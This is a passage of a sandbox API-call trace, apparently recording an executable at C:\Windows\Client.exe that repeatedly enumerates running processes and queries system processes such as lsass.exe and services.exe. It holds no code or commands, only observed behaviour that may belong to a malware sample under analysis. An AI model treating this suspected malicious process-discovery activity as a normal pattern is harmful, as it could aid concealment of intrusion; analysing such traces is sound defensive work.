lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18fd48) returned 1 [0289.742] CloseHandle (hObject=0x170) returned 1 [0289.742] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0289.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x170 [0289.742] GetPriorityClass (hProcess=0x170) returned 0x20 [0289.742] CloseHandle (hObject=0x170) returned 1 [0289.742] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d0) returned 0x170 [0289.743] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\lsass.exe", lpdwSize=0x18fd44) returned 1 [0289.745] CloseHandle (hObject=0x170) returned 1 [0289.745] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0289.748] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.749] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.750] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.751] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.752] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.753] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.753] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0289.754] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0289.755] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0289.755] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x170) returned 0x178 [0289.755] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0289.756] CloseHandle (hObject=0x178) returned 1 [0289.756] CloseHandle (hObject=0x170) returned 1 [0289.756] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x170) returned 0x170 [0289.756] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\wininit.exe", lpdwSize=0x18faf0) returned 1 [0289.757] CloseHandle (hObject=0x170) returned 1 [0289.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wininit.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0289.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wininit.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0289.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wininit.exe", cchWideChar=31, lpMultiByteStr=0x9e08c8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\wininit.exe", lpUsedDefaultChar=0x0) returned 31 [0289.757] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d0) returned 0x170 [0289.757] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\lsass.exe", lpdwSize=0x18fd48) returned 1 [0289.760] CloseHandle (hObject=0x170) returned 1 [0289.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\lsass.exe", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0289.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\lsass.exe", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0289.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\lsass.exe", cchWideChar=29, lpMultiByteStr=0x9e08f8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\lsass.exe", lpUsedDefaultChar=0x0) returned 29 [0289.760] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d0) returned 0x170 [0289.760] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\lsass.exe", lpdwSize=0x18fd40) returned 1 [0289.856] CloseHandle (hObject=0x170) returned 1 [0289.856] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d0) returned 0x170 [0289.856] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\lsass.exe", lpdwSize=0x18fd48) returned 1 [0289.860] CloseHandle (hObject=0x170) returned 1 [0289.860] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d0) returned 0x170 [0289.860] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\lsass.exe", lpdwSize=0x18fd48) returned 1 [0289.864] CloseHandle (hObject=0x170) returned 1 [0289.864] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0289.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x170 [0289.864] GetPriorityClass (hProcess=0x170) returned 0x20 [0289.864] CloseHandle (hObject=0x170) returned 1 [0289.864] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d8) returned 0x170 [0289.864] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\lsm.exe", lpdwSize=0x18fd44) returned 1 [0289.868] CloseHandle (hObject=0x170) returned 1 [0289.868] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0289.873] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.874] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.875] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.876] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.877] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.878] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.878] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0289.879] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0289.880] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0289.881] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0289.882] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x170) returned 0x178 [0289.882] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0289.882] CloseHandle (hObject=0x178) returned 1 [0289.883] CloseHandle (hObject=0x170) returned 1 [0289.883] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x170) returned 0x170 [0289.883] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\wininit.exe", lpdwSize=0x18faf0) returned 1 [0289.884] CloseHandle (hObject=0x170) returned 1 [0289.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wininit.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0289.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wininit.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0289.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wininit.exe", cchWideChar=31, lpMultiByteStr=0x9e0928, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\wininit.exe", lpUsedDefaultChar=0x0) returned 31 [0289.885] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d8) returned 0x170 [0289.885] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\lsm.exe", lpdwSize=0x18fd48) returned 1 [0289.889] CloseHandle (hObject=0x170) returned 1 [0289.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\lsm.exe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0289.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\lsm.exe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0289.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\lsm.exe", cchWideChar=27, lpMultiByteStr=0x9d92a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\lsm.exee", lpUsedDefaultChar=0x0) returned 27 [0289.889] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d8) returned 0x170 [0289.889] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\lsm.exe", lpdwSize=0x18fd40) returned 1 [0289.892] CloseHandle (hObject=0x170) returned 1 [0289.892] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d8) returned 0x170 [0289.892] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\lsm.exe", lpdwSize=0x18fd48) returned 1 [0289.895] CloseHandle (hObject=0x170) returned 1 [0289.895] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d8) returned 0x170 [0289.895] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\lsm.exe", lpdwSize=0x18fd48) returned 1 [0289.898] CloseHandle (hObject=0x170) returned 1 [0289.899] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0289.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x170 [0289.899] GetPriorityClass (hProcess=0x170) returned 0x20 [0289.899] CloseHandle (hObject=0x170) returned 1 [0289.899] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x248) returned 0x170 [0289.899] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd44) returned 1 [0290.156] CloseHandle (hObject=0x170) returned 1 [0290.156] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0290.159] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.160] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.160] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.161] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.162] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.162] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.163] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.164] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.164] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.165] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0290.166] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.166] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0290.167] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0290.167] CloseHandle (hObject=0x178) returned 1 [0290.167] CloseHandle (hObject=0x170) returned 1 [0290.167] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0290.167] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0290.168] CloseHandle (hObject=0x170) returned 1 [0290.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e0958, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0290.169] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x248) returned 0x170 [0290.169] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.171] CloseHandle (hObject=0x170) returned 1 [0290.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x9e0928, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\svchost.exe", lpUsedDefaultChar=0x0) returned 31 [0290.171] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x248) returned 0x170 [0290.171] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd40) returned 1 [0290.173] CloseHandle (hObject=0x170) returned 1 [0290.173] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x248) returned 0x170 [0290.173] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.176] CloseHandle (hObject=0x170) returned 1 [0290.176] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x248) returned 0x170 [0290.176] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.178] CloseHandle (hObject=0x170) returned 1 [0290.178] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0290.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x170 [0290.178] GetPriorityClass (hProcess=0x170) returned 0x20 [0290.178] CloseHandle (hObject=0x170) returned 1 [0290.178] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x28c) returned 0x170 [0290.178] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd44) returned 1 [0290.180] CloseHandle (hObject=0x170) returned 1 [0290.180] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0290.184] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.184] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.185] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.186] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.186] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.187] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, 